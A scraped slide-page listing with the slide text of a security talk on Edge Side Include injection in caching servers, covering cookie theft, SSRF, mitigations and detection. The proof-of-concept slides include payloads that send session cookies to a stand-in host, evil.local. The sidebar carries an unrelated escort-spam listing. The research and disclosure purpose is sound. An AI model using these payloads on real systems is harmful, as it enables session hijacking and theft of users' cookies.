Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Recently uploaded

Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 

Recently uploaded (20)

Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 

Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparent Session Hijacking

  • 1. Edge Side Include Injection Abusing Caching Servers into SSRF and Transparent Session Hijacking Louis Dion-Marcil @ldionmarcil GoSecure
  • 2. Edge Side Includes (ESI) — Context ❖ New class of attack on some caching servers ❖ Discovered by reading documentation
  • 3. ESI — Brief Overview
  • 4. ESI — Brief Overview The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27°C 23°C 31°C
  • 5. ESI — Brief Overview The Weather Website Forecast for Monday Tuesday Wednesday Montréal 27°C 23°C 31°C Variable Fragments Static Fragment
  • 6. ESI — Brief Overview ❖ Adds fragmentation to caching ❖ App Server send fragment markers in HTTP responses <esi:[action] attr="val" /> ❖ ESI tags are parsed by the HTTP surrogate (load balancer, proxy) ❖ Most engines require specific App Server HTTP Headers
  • 7. ESI Features & Syntax — Include //esi/page-1.html: <html> <p>This is page 1!</p> <esi:include src="//api/page-2.html" /> </html> //api/page-2.html: <p>This is page 2!</p>
  • 8. ESI Features & Syntax — Include $ curl -s http://esi/page-1.html <html> <p>This is page 1!</p> <p>This is page 2!</p> </html>
  • 9. ESI — Include Network Flow (Cache MISS)
  • 10. ESI — Include Network Flow (Cache MISS) ①/1.html
  • 11. ESI — Include Network Flow (Cache MISS) ①/1.html ②/1.html
  • 12. ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③
  • 13. ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ESI tags processed
  • 14. ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html ESI tags processed
  • 15. ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html 2.html⑤ ESI tags processed
  • 16. ESI — Include Network Flow (Cache MISS) ①/1.html 1.html + ESI ②/1.html ③ ④/api/2.html 2.html⑤ ⑥ + ESI tags processed
  • 17. ESI Features & Syntax — Variables <esi:vars>$(VARIABLE_NAME)</esi:vars>
  • 18. ESI Features & Syntax — Variables <esi:vars>$(VARIABLE_NAME)</esi:vars> $(HTTP_USER_AGENT) → Mozilla/5.0 (X11;[…] $(QUERY_STRING) → city=Montreal&format=C $(HTTP_COOKIE) → _ga=[…]&__utma=[…]
  • 19. ESI — Vulnerabilities ESI tags are sent by the application server… … Parsed by the HTTP Surrogate. How can the ESI Engine tell which tags are legitimate?
  • 20. ESI — Vulnerabilities ESI tags are sent by the application server… … Parsed by the HTTP Surrogate. How can the ESI Engine tell which tags are legitimate? It can’t, and that’s a pretty big design flaw.
  • 21. ESI — Injection <p> City: <?= $_GET['city'] ?> </p>
  • 22. ESI — Injection <p> City: <?= $_GET['city'] ?> </p> <p> City: <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> </p>
  • 23. ESI — Injection <p> City: <?= $_GET['city'] ?> </p> <p> City: <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> </p>
  • 24. ESI Implementations — Apache Traffic Server ❖ Donated by Yahoo! to Apache ❖ ESI stack implemented, with bonus features ❖ Used by Yahoo, Apple
  • 25. ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌
  • 26. ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... or are they? <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌ <esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅
  • 27. ESI Implementations — Apache Traffic Server ❖ Offers Cookie whitelisting ❖ Critical cookies not accessible by ESI... or are they? <esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌ <esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅ → "_ga=[…]&PHPSESSID=b9gcvscc[…]"
  • 28. DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... "> <img src=" //evil.local/<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ">
  • 29. DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... "> <img src=" //evil.local/<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ">
  • 30. DEMO 1 — Proof of concept <img src=" //evil.local/username=attacker;session_cookie=s%3ANp... ">
  • 31. DEMO 1 — Proof of concept http://evil.local/username=attacker;session_cookie=s%3A... Internet
  • 32. DEMO 1 Now we know... ❖ … we can inject ESI tags, ❖ … we can leak HTTPOnly cookies, ❖ … we don’t need JavaScript. Let’s crank the impact up a notch.
  • 33. ESI Implementations — Oracle Web Cache ❖ Part of the 11g suite ❖ Usually serves WebLogic Application Servers ❖ Initial ESI specification implemented, plus features
  • 34. DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/? <esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>"); x.send(); </esi:inline>
  • 35. DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/? <esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>"); x.send(); </esi:inline>
  • 36. DEMO 2 — Proof of concept <esi:inline name="/js/jquery.js" /> var x = new XMLHttpRequest(); x.open("GET", "//evil.local/?lHKlM77VbP79hDnMX2Gg..."); x.send(); </esi:inline>
  • 37. DEMO 2 — Proof of concept http://evil.local/?lHKlM77VbP79hDnMX2Gg... Internet
  • 38. DEMO 2 Now we know... ❖ … we can overwrite arbitrary cache entries, ❖ … we can leak HTTPOnly cookies, ❖ … JavaScript helps, but not required.
  • 39. ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set
  • 40. ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" }
  • 41. ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" } Invalid ESI tag!
  • 42. ESI — Mitigations ❖ mod_security with the OWASP Core Rule Set ❖ Proactive escaping { "first_name": "Louis", "last_name": "<esi:include src="/page-2.html" />" } "last_name": "<esi:include src=/page-2.html />" ❖ This is valid with Apache Traffic Server Invalid ESI tag!
  • 43. SSRF with Apache Traffic Server
  • 44. SSRF with Apache Traffic Server
  • 45. SSRF with Apache Traffic Server
  • 46. ESI — SSRF Flow ①/api/me /api/me + ESI ②/api/me ③ /server-status server-status⑤ ⑥ + ESI tags processed ④
  • 47. ESI — Manual Detection (by Alex Birsan @alxbrsn) FOO<!--esi -->BAR → FOOBAR ✅ FOO<!--foo -->BAR → FOO<!--foo -->BAR ❌
  • 48. ESI — Manual Detection (by Alex Birsan @alxbrsn) FOO<!--esi -->BAR → FOOBAR ✅ FOO<!--foo -->BAR → FOO<!--foo -->BAR ❌ ESI — Automatic Detection ❖ Burp ActiveScan++ ❖ Burp Upload Scanner ❖ Acunetix
  • 49. ESI — Migration (by Lukas Rieder @overbryd) ❖ Cloudflare Workers https://gist.github.com/Overbryd/c070bb1fa769609d404f648c d506340f
  • 50. Questions? Detailed blogpost of our prior research: https://gosecure.net/2018/04/03/beyond-xss-edge-side-include-injection/ Louis Dion-Marcil @ldionmarcil GoSecure